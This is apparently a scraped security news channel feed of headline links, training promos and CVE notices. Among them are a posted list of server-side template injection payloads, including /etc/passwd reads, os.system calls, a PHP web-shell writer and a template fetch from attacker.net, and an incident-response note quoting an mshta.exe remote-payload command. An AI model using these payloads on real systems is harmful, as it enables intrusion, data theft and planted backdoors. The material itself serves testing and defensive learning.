Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐ Typosquatting Attacks Target Popular npm Packages
https://undercodenews.com/typosquatting-attacks-target-popular-npm-packages/
@Undercode_News
https://undercodenews.com/typosquatting-attacks-target-popular-npm-packages/
@Undercode_News
UNDERCODE NEWS
Typosquatting Attacks Target Popular npm Packages - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐ ๏ธ #Windows 11 Slowdown? Quick Fixes for a Smoother Experience
https://undercodenews.com/windows-11-slowdown-quick-fixes-for-a-smoother-experience/
@Undercode_News
https://undercodenews.com/windows-11-slowdown-quick-fixes-for-a-smoother-experience/
@Undercode_News
UNDERCODE NEWS
Windows 11 Slowdown? Quick Fixes for a Smoother Experience - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE TESTING
๐ฆMaster Cybersecurity Awareness: Protect Yourself in the Digital World!
In the ever-evolving digital landscape, cyber threats are becoming increasingly sophisticated. Whether youโre an individual user or a professional, understanding cybersecurity is crucial to protecting your data, privacy, and assets.
๐ The Cybersecurity Awareness Handbook is your one-stop guide to safeguarding your online presence. Hereโs what it covers:
๐ Key Insights in the Handbook
1๏ธโฃ Understanding Cyber Threats
โข Learn about phishing, ransomware, malware, and social engineering attacks.
โข Understand how attackers exploit vulnerabilities in systems and human behavior.
2๏ธโฃ Building Strong Cyber Defenses
โข Create robust passwords and implement multi-factor authentication (MFA).
โข Discover the importance of regular software updates and patch management.
3๏ธโฃ Safe Online Practices
โข Tips for secure online shopping and social media usage.
โข Identifying fake websites and avoiding harmful downloads.
4๏ธโฃ Incident Response Plans
โข Step-by-step guidance on responding to data breaches or system compromises.
โข Learn about reporting cybercrimes and recovering from attacks.
5๏ธโฃ Empowering Your Workplace
โข Tips for creating a cybersecurity culture in professional environments.
โข How employees can become the first line of defense against cyber threats.
๐ก Why You Need This Handbook
โข Stay Ahead of Threats: Cybersecurity is evolving daily; this guide keeps you informed.
โข Actionable Tips: Practical steps to implement immediately for better security.
โข Comprehensive Knowledge: From basic concepts to advanced strategies, itโs all here.
๐ก Ready to strengthen your cybersecurity skills?
Download the Cybersecurity Awareness Handbook now and take charge of your online safety.
Ref: Mahesh Girhe
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
In the ever-evolving digital landscape, cyber threats are becoming increasingly sophisticated. Whether youโre an individual user or a professional, understanding cybersecurity is crucial to protecting your data, privacy, and assets.
๐ The Cybersecurity Awareness Handbook is your one-stop guide to safeguarding your online presence. Hereโs what it covers:
๐ Key Insights in the Handbook
1๏ธโฃ Understanding Cyber Threats
โข Learn about phishing, ransomware, malware, and social engineering attacks.
โข Understand how attackers exploit vulnerabilities in systems and human behavior.
2๏ธโฃ Building Strong Cyber Defenses
โข Create robust passwords and implement multi-factor authentication (MFA).
โข Discover the importance of regular software updates and patch management.
3๏ธโฃ Safe Online Practices
โข Tips for secure online shopping and social media usage.
โข Identifying fake websites and avoiding harmful downloads.
4๏ธโฃ Incident Response Plans
โข Step-by-step guidance on responding to data breaches or system compromises.
โข Learn about reporting cybercrimes and recovering from attacks.
5๏ธโฃ Empowering Your Workplace
โข Tips for creating a cybersecurity culture in professional environments.
โข How employees can become the first line of defense against cyber threats.
๐ก Why You Need This Handbook
โข Stay Ahead of Threats: Cybersecurity is evolving daily; this guide keeps you informed.
โข Actionable Tips: Practical steps to implement immediately for better security.
โข Comprehensive Knowledge: From basic concepts to advanced strategies, itโs all here.
๐ก Ready to strengthen your cybersecurity skills?
Download the Cybersecurity Awareness Handbook now and take charge of your online safety.
Ref: Mahesh Girhe
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
โก๏ธ #Google #Chrome's New Tab Trick: Archiving Duplicates on #Android
https://undercodenews.com/google-chromes-new-tab-trick-archiving-duplicates-on-android/
@Undercode_News
https://undercodenews.com/google-chromes-new-tab-trick-archiving-duplicates-on-android/
@Undercode_News
UNDERCODE NEWS
Google Chrome's New Tab Trick: Archiving Duplicates on Android - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE TESTING
๐ฆ Secure Code Review Challenge 16:
The goal of this challenge is to pop a shell ๐ and then provide concrete code-level remediation guidance on how to fix the vulnerability.
You can run the challenge on your machine by cloning the GitHub repo > GET <, navigating into './challenge-16', and running 'docker-compose up'.
Ref: Florian WalterFlorian Walter
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
The goal of this challenge is to pop a shell ๐ and then provide concrete code-level remediation guidance on how to fix the vulnerability.
You can run the challenge on your machine by cloning the GitHub repo > GET <, navigating into './challenge-16', and running 'docker-compose up'.
Ref: Florian WalterFlorian Walter
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐ฅ๏ธ Informative #NASA Successfully Tests SLS Launch Control System
https://undercodenews.com/informative-nasa-successfully-tests-sls-launch-control-system/
@Undercode_News
https://undercodenews.com/informative-nasa-successfully-tests-sls-launch-control-system/
@Undercode_News
UNDERCODE NEWS
Informative NASA Successfully Tests SLS Launch Control System - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE TESTING
๐ฆHow Account Takeover Techniques: Critical Vulnerabilities Mindmap" ?
Account takeover (ATO) is a critical vulnerability that can compromise sensitive user data and system integrity. This mindmap outlines various ATO techniques, including:
IDOR in Password Reset
Password Reset Poisoning
Mass Assignment
OAuth Misconfigurations
Improper Rate-Limit Checks etc...........
Ref: AMIT KUMAR
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Account takeover (ATO) is a critical vulnerability that can compromise sensitive user data and system integrity. This mindmap outlines various ATO techniques, including:
IDOR in Password Reset
Password Reset Poisoning
Mass Assignment
OAuth Misconfigurations
Improper Rate-Limit Checks etc...........
Ref: AMIT KUMAR
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE TESTING
๐ฆFREE courses to boost your skills! ๐
1. Splunk Courses
lnkd.in/d_dZNduf
2. Fortinet Courses
lnkd.in/dmmkZ-tH
3. AttackIQ MITRE ATT&CK Courses
lnkd.in/dcfmSPEJ
4. Microsoft SC-200 Course
lnkd.in/dbCn3k4n
5. Awesome OSINT Courses
lnkd.in/dTCaCf-u
6. CSILinux Forensic Trainings
lnkd.in/dhjwx_5h
Ref: Mohamed Hamdi
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
1. Splunk Courses
lnkd.in/d_dZNduf
2. Fortinet Courses
lnkd.in/dmmkZ-tH
3. AttackIQ MITRE ATT&CK Courses
lnkd.in/dcfmSPEJ
4. Microsoft SC-200 Course
lnkd.in/dbCn3k4n
5. Awesome OSINT Courses
lnkd.in/dTCaCf-u
6. CSILinux Forensic Trainings
lnkd.in/dhjwx_5h
Ref: Mohamed Hamdi
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
#Windows 11 24H2: A Buggy Mess?
https://undercodenews.com/windows-11-24h2-a-buggy-mess/
@Undercode_News
https://undercodenews.com/windows-11-24h2-a-buggy-mess/
@Undercode_News
UNDERCODE NEWS
Windows 11 24H2: A Buggy Mess? - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE TESTING
๐ฆNew SSTI (Server Side Template Injection) - Payloads
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
Ref: Aman Dara
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
Ref: Aman Dara
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Bridging the #Digital Divide: The Future of Identity Verification
https://undercodenews.com/bridging-the-digital-divide-the-future-of-identity-verification/
@Undercode_News
https://undercodenews.com/bridging-the-digital-divide-the-future-of-identity-verification/
@Undercode_News
UNDERCODE NEWS
Bridging the Digital Divide: The Future of Identity Verification - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE TESTING
๐ฆ LOLbins attacks :
mshta.exe is a legitimate system executable included in Microsoft Windows. It stands for Microsoft HTML Application Host, and its primary purpose is to execute HTML Applications (HTA files). These HTA files are standalone applications that use HTML, JavaScript, VBScript, or other scripting languages.
During an incident response exercise, we identified a sophisticated adversary leveraging Living-Off-The-Land Binaries (LOLBins) to perform malicious actions. They used PowerShell to execute commands, minimizing their footprint and evading detection.
The activity was flagged when Windows Defender logged multiple Event ID 4104 entries in the Microsoft-Windows-PowerShell/Operational log.
Note : These logs revealed suspicious PowerShell commands executing obfuscated scripts.
Further investigation uncovered the use of mshta.exe to load a remote payload via a seemingly legitimate URL.
Key points:
Attackers frequently abuse mshta.exe as part of Living-Off-The-Land Binaries (LOLBins) because:
1>Bypasses Security Controls:
Since it's a legitimate system utility, some security tools may not flag its use as suspicious.
2>Remote Code Execution:
mshta.exe can execute malicious scripts hosted remotely, allowing attackers to deliver payloads via URLs.
Sample Code : mshta.exe "hzzp://malicious-domain[.]com/payload[.]hta"
hashtag#incidentresponse hashtag#dfir hashtag#soc hashtag#cybersecurity hashtag#mitre hashtag#attack hashtag#windows
Ref: Soumick kar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
mshta.exe is a legitimate system executable included in Microsoft Windows. It stands for Microsoft HTML Application Host, and its primary purpose is to execute HTML Applications (HTA files). These HTA files are standalone applications that use HTML, JavaScript, VBScript, or other scripting languages.
During an incident response exercise, we identified a sophisticated adversary leveraging Living-Off-The-Land Binaries (LOLBins) to perform malicious actions. They used PowerShell to execute commands, minimizing their footprint and evading detection.
The activity was flagged when Windows Defender logged multiple Event ID 4104 entries in the Microsoft-Windows-PowerShell/Operational log.
Note : These logs revealed suspicious PowerShell commands executing obfuscated scripts.
Further investigation uncovered the use of mshta.exe to load a remote payload via a seemingly legitimate URL.
Key points:
Attackers frequently abuse mshta.exe as part of Living-Off-The-Land Binaries (LOLBins) because:
1>Bypasses Security Controls:
Since it's a legitimate system utility, some security tools may not flag its use as suspicious.
2>Remote Code Execution:
mshta.exe can execute malicious scripts hosted remotely, allowing attackers to deliver payloads via URLs.
Sample Code : mshta.exe "hzzp://malicious-domain[.]com/payload[.]hta"
hashtag#incidentresponse hashtag#dfir hashtag#soc hashtag#cybersecurity hashtag#mitre hashtag#attack hashtag#windows
Ref: Soumick kar
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Two Cosmonauts Embark on Busy Spacewalk to Enhance Space Station Capabilities
https://undercodenews.com/two-cosmonauts-embark-on-busy-spacewalk-to-enhance-space-station-capabilities/
@Undercode_News
https://undercodenews.com/two-cosmonauts-embark-on-busy-spacewalk-to-enhance-space-station-capabilities/
@Undercode_News
UNDERCODE NEWS
Two Cosmonauts Embark on Busy Spacewalk to Enhance Space Station Capabilities - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐ฎ The Evolution of #Gaming Laptops: From Bulky Beasts to Sleek Powerhouses
https://undercodenews.com/the-evolution-of-gaming-laptops-from-bulky-beasts-to-sleek-powerhouses/
@Undercode_News
https://undercodenews.com/the-evolution-of-gaming-laptops-from-bulky-beasts-to-sleek-powerhouses/
@Undercode_News
UNDERCODE NEWS
The Evolution of Gaming Laptops: From Bulky Beasts to Sleek Powerhouses - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE TESTING
๐๐๐๐_๐๐ฒ๐๐๐ซ๐ฌ๐๐๐ฎ๐ซ๐ข๐ญ๐ฒ_๐๐ฎ๐๐ข๐ญ_๐๐ก๐๐๐ค๐ฅ๐ข๐ฌ๐ญ.pdf
1.7 MB
๐๐๐๐ ๐๐ฒ๐๐๐ซ๐ฌ๐๐๐ฎ๐ซ๐ข๐ญ๐ฒ ๐๐ฎ๐๐ข๐ญ ๐๐ก๐๐๐ค๐ฅ๐ข๐ฌ๐ญ
Forwarded from DailyCVE
๐ด WhoDB, Critical DoS Vulnerability (#CVE-TBD)
https://dailycve.com/whodb-critical-dos-vulnerability-cve-tbd/
@DailyCVE
https://dailycve.com/whodb-critical-dos-vulnerability-cve-tbd/
@DailyCVE
DailyCVE
WhoDB, Critical DoS Vulnerability (CVE-TBD) - DailyCVE
2024-12-19 Platform: WhoDB Version: All versions up to v0.43.0 Vulnerability: Denial-of-Service (DoS) Severity: Critical Date: Not specified What Undercode Says: [โฆ]
Forwarded from DailyCVE
๐ต Astro, Source Map Disclosure (Low)
https://dailycve.com/astro-source-map-disclosure-low/
@Daily_CVE
https://dailycve.com/astro-source-map-disclosure-low/
@Daily_CVE
DailyCVE
Astro, Source Map Disclosure (Low) - DailyCVE
2024-12-19 Form: Platform: Astro Version: Server-output: 5.0.3 โ 5.0.6 Static-output: 4.16.17 or older & 5.0.7 or older Vulnerability: Source Map [โฆ]